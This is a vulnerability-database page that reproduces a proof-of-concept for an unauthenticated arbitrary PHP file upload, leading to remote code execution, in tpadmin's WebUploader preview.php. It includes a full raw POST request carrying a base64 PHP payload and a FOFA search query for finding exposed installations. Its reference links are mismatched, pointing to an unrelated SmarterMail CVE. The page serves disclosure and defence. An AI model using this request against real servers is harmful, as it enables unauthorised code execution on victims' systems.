Vulners
Lucene search
📄 yuan1994 tpadmin Shell Upload
| Reporter | Title | Published | Views | Family All 36 |
|---|---|---|---|---|
 | Exploit for CVE-2026-23760 | 24 Jan 202612:30 | – | githubexploit |
 | CVE-2026-23760 | 22 Jan 202614:35 | – | attackerkb |
| CVE-2026-2113 | 7 Feb 202621:02 | – | attackerkb |
 | CVE-2026-2113 | 8 Feb 202600:34 | – | circl |
| CVE-2026-23760 | 22 Jan 202615:50 | – | circl |
 | SmarterTools SmarterMail Authentication Bypass Using an Alternate Path or Channel Vulnerability | 26 Jan 202600:00 | – | cisa_kev |
 | CISA Adds Five Known Exploited Vulnerabilities to Catalog | 26 Jan 202612:00 | – | cisa |
 | SmarterTools SmarterMail security vulnerability | 22 Jan 202600:00 | – | cnnvd |
| tpAdmin 代码问题漏洞 | 7 Feb 202600:00 | – | cnnvd |
 | CVE-2026-2113 | 7 Feb 202621:02 | – | cve |
10
# tpadmin-CVE-2026-2113-poc
A proof-of-concept exploiting a Remote Code Execution with web server privileges via Arbitrary File Upload.
# Vulnerability Description
A critical Remote Code Execution vulnerability exists in H-ui.admin system's WebUploader preview component. The `<font style="color:rgb(15, 17, 21);background-color:rgb(235, 238, 242);">/public/static/admin/lib/webuploader/0.1.5/server/preview.php</font>` file lacks proper authentication and file validation, allowing unauthenticated attackers to upload arbitrary PHP files directly to the web server. This results in immediate Remote Code Execution with web server privileges.
# Affected Versions
- tpadmin up to version 1.3.12
# Poc (by sTy1H)
1. Construct payload (Encode the dangerous statement in base64)
```bash
printf "<? php phpinfo();?>" | base64
PD9waHAgcGhwaW5mbygpOz8+
```
2. Construct the POST request with our payload
```html
POST /admin/lib/webuploader/0.1.5/server/preview.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: PHPSESSID=6mqs895r9r0k9ci9jj0hms506n
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
data:image/php;base64,PD9waHAgcGhwaW5mbygpOz8+
```
3. Visit the returned url
<img width="800" height="600" alt="image" src="https://github.com/user-attachments/assets/beaa331e-0553-4b71-b4bc-a38dcbd759e5" />
# Into the wild
FOFA:
```
title='Tpadmin'
```
# Impact
An unauthenticated remote attacker can exploit an Arbitrary File Upload to gain an RCE with web server privileges.
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P - 6.9:Medium
# Remediation & Mitigation
There is no information about possible countermeasures known. It may be suggested to replace the affected object with an alternative product.
# References
- https://github.com/yuan1994/tpAdmin
- [https://www.smartertools.com/smartermail/release-notes/current](https://www.cve.org/CVERecord?id=CVE-2026-2113))
- [https://nvd.nist.gov/vuln/detail/CVE-2026-23760](https://github.com/sTy1H/CVE-Report/blob/main/Remote%20Code%20Execution%20Vulnerability%20in%20Tpadmin%20System.md)Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
10 Feb 2026 00:00Current
5.5Medium risk
Vulners AI Score5.5
CVSS 49.3
CVSS 3.17.3 - 9.8
CVSS 27.5
CVSS 37.3
EPSS0.81651
SSVC